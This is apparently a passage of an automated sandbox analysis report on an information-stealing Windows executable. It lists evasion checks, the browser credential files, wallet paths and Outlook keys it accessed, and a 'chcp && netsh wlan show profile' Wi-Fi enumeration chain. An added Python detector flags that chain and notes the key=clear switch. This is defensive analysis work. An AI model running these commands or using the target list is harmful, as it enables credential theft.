            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMToolsHook.dll
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmmousever.dll
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmmousever
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmmouseverLR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VirtualMachine: @
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareLR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMToolsHookLR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000264C000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002648000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VirtualMachine: False
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VirtualMachine:
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMToolsHook
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Process queried: DebugPort (2 occurrences)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (2 occurrences)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Queries volume information: C:\Users\user\Desktop\wssvZm9dNK.exe VolumeInformation
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
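            The chain cmd.exe /C chcp 65001 && netsh wlan show profile | findstr All is listed under Malware Analysis System Evasion, under Lowering of HIPS / PFW above and again under Stealing of Sensitive Information below; it is the enumeration step behind the "Capture Wi-Fi password" Sigma hit in the overview. On its own, netsh wlan show profile only lists profile names; the key=clear switch is what dumps a stored PSK. The Python below is an added detection example written for this page, not Joe Sandbox or Sigma code: it reads process-creation events in a Sysmon Event ID 1 style (the JSON field names, the pids other than 2036, and the benign administrative events are assumptions constructed for the example; the images and command lines mirror the report), flags netsh profile enumeration including netsh's abbreviated verbs, rates key=clear higher, and walks the parent chain past shells so the alert is attributed to the executable that launched the shell rather than to cmd.exe.

```python
"""Detect the Wi-Fi profile harvesting chain (cmd.exe /C chcp && netsh wlan show profile
| findstr) in process-creation events and attribute it to the launching process."""
import json
import re
from typing import Dict, List, Optional

# Constructed events (pid, ppid, image, command line); they mirror the report's process
# tree but are example data, not sandbox telemetry.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 2036, "ppid": 1500, "image": "C:\\Users\\user\\Desktop\\wssvZm9dNK.exe",
     "cmdline": "\"C:\\Users\\user\\Desktop\\wssvZm9dNK.exe\""},
    {"pid": 3000, "ppid": 2036, "image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "cmdline": "\"cmd.exe\" /C chcp 65001 && netsh wlan show profile | findstr All"},
    {"pid": 3004, "ppid": 3000, "image": "C:\\Windows\\SysWOW64\\chcp.com", "cmdline": "chcp 65001"},
    {"pid": 3008, "ppid": 3000, "image": "C:\\Windows\\SysWOW64\\netsh.exe",
     "cmdline": "netsh wlan show profile"},
    {"pid": 3012, "ppid": 3000, "image": "C:\\Windows\\SysWOW64\\findstr.exe", "cmdline": "findstr All"},
    # Routine administration that must not fire.
    {"pid": 4000, "ppid": 1500, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 4004, "ppid": 4000, "image": "C:\\Windows\\System32\\netsh.exe",
     "cmdline": "netsh interface show interface"},
])

# Shells and launchers to walk past when looking for the originating program.
INTERMEDIARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "conhost.exe", "wscript.exe", "cscript.exe"}
# netsh accepts abbreviated verbs, so also match "wlan sh p", "wlan s profiles", and so on.
WLAN_PROFILE_RE = re.compile(r"\bwlan\s+(?:show|sh|s)\s+(?:profiles?|p)\b", re.I)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.I)


def load_events(text: str) -> List[dict]:
    """One JSON object per line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def originating_process(procs: Dict[int, dict], pid: int, max_depth: int = 8) -> Optional[dict]:
    """Follow ppid links upward past shells. Returns the first non-shell ancestor, or the
    last process whose parent is missing from telemetry, or None for an unknown pid."""
    current = procs.get(pid)
    seen = set()
    while current is not None and current["pid"] not in seen and len(seen) < max_depth:
        seen.add(current["pid"])
        parent = procs.get(current["ppid"])
        if parent is None:
            return current
        if image_name(parent["image"]) not in INTERMEDIARIES:
            return parent
        current = parent
    return current


def detect_wlan_harvesting(events: List[dict]) -> List[dict]:
    """One finding per netsh.exe that enumerates WLAN profiles."""
    procs = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) != "netsh.exe":
            continue
        cmdline = e.get("cmdline", "")
        if not WLAN_PROFILE_RE.search(cmdline):
            continue
        parent = procs.get(e["ppid"])
        parent_cmd = parent.get("cmdline", "") if parent else ""
        origin = originating_process(procs, e["pid"])
        findings.append({
            "pid": e["pid"],
            # key=clear dumps the PSK; a bare profile listing is the enumeration step.
            "severity": "high" if KEY_CLEAR_RE.search(cmdline) else "medium",
            # cmd /C ... | findstr is the one-shot, output-scraping shape seen in the report.
            "one_shot_scrape": bool(re.search(r"/c\b.*\|\s*findstr", parent_cmd, re.I)),
            "origin": origin["image"] if origin else None,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_wlan_harvesting(load_events(SAMPLE_EVENTS)):
        print(json.dumps(finding))
```

            Feed it real telemetry by mapping Sysmon Event ID 1 or Security 4688 records onto the same four fields. The attribution step is what makes the alert actionable: the netsh.exe and cmd.exe rows by themselves look the same as a help-desk script, whereas a profile listing whose nearest non-shell ancestor is an executable on a user's desktop is the shape recorded in this report.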

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: pSC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: p3C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: p0C:\Users\user\AppData\Roaming\Ethereum\keystoret-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: p4C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
            Source: wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: p0C:\Users\user\AppData\Roaming\Ethereum\keystoret-
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All (2 occurrences)
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile (2 occurrences)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key4.db
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert9.db
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (8 occurrences)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 (19 occurrences)
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
            Source: C:\Users\user\Desktop\wssvZm9dNK.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
Source: Yara match, File source: 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR
MITRE ATT&CK matrix (tactic: techniques as listed in the report; the numbers preceding some techniques are carried over unchanged from the matrix cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 131 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 11 Disable or Modify Tools; 161 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; Compile After Delivery
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 341 Security Software Discovery; 1 Process Discovery; 161 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 44 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 2 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

Source | Detection | Scanner | Label
wssvZm9dNK.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
wssvZm9dNK.exe | 100% | Avira | TR/Dropper.MSIL.Gen
wssvZm9dNK.exe | 100% | Joe Sandbox ML |

No Antivirus matches (dropped files, unpacked PE files, domains)
Source | Detection | Scanner | Label
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://ip-api.com | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdfw | 0% | Avira URL Cloud | safe
http://icanhazip.com/ | 0% | Avira URL Cloud | safe
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf | 0% | Avira URL Cloud | safe
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i | 0% | Avira URL Cloud | safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://www.google.com/favicon.ico | 0% | Avira URL Cloud | safe
https://www.google.com/sorry/index | 0% | Avira URL Cloud | safe
https://whatismyipaddressnow.co/API/FETCH/getcountry.php | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
https://www.google.com/search?q=net | 0% | Avira URL Cloud | safe
https://www.google.com/sorry/indextest | 0% | Avira URL Cloud | safe
http://icanhazip.com | 0% | Avira URL Cloud | safe
https://www.google.com/search?q=wmf | 0% | Avira URL Cloud | safe
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a | 0% | Avira URL Cloud | safe
http://java.sun.com | 0% | Avira URL Cloud | safe
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Avira URL Cloud | safe
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceidLR | 0% | Avira URL Cloud | safe
http://whatismyipaddressnow.co | 0% | Avira URL Cloud | safe
https://www.google.com/search?q=te | 0% | Avira URL Cloud | safe
https://whatismyipaddressnow.co | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
whatismyipaddressnow.co | 188.114.96.3 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
icanhazip.com | 104.16.185.241 | true | false | | unknown
90.168.9.0.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | false | Avira URL Cloud: safe | unknown
https://whatismyipaddressnow.co/API/FETCH/getcountry.php | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf | tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i | tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdfw | wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/favicon.ico | tmpEEA8.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.dr | false | URL Reputation: safe | unknown
http://java.sun.com | wssvZm9dNK.exe, 00000000.00000002.401997905.000000000591F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/sorry/index | wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003877000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007377000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.000000000340D000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000264C000.00000004.00000800.00020000.00000000.sdmp, tmp3E8D.tmp.dat.0.dr, tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/search?q=wmf | tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
http://ip-api.com | wssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a | tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/search?q=net | tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/sorry/indextest | wssvZm9dNK.exe, 00000000.00000002.401400775.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003862000.00000004.00000800.00020000.00000000.sdmp, tmp3E8D.tmp.dat.0.dr, tmp8E34.tmp.dat.0.dr | false | Avira URL Cloud: safe | unknown
http://icanhazip.com | wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
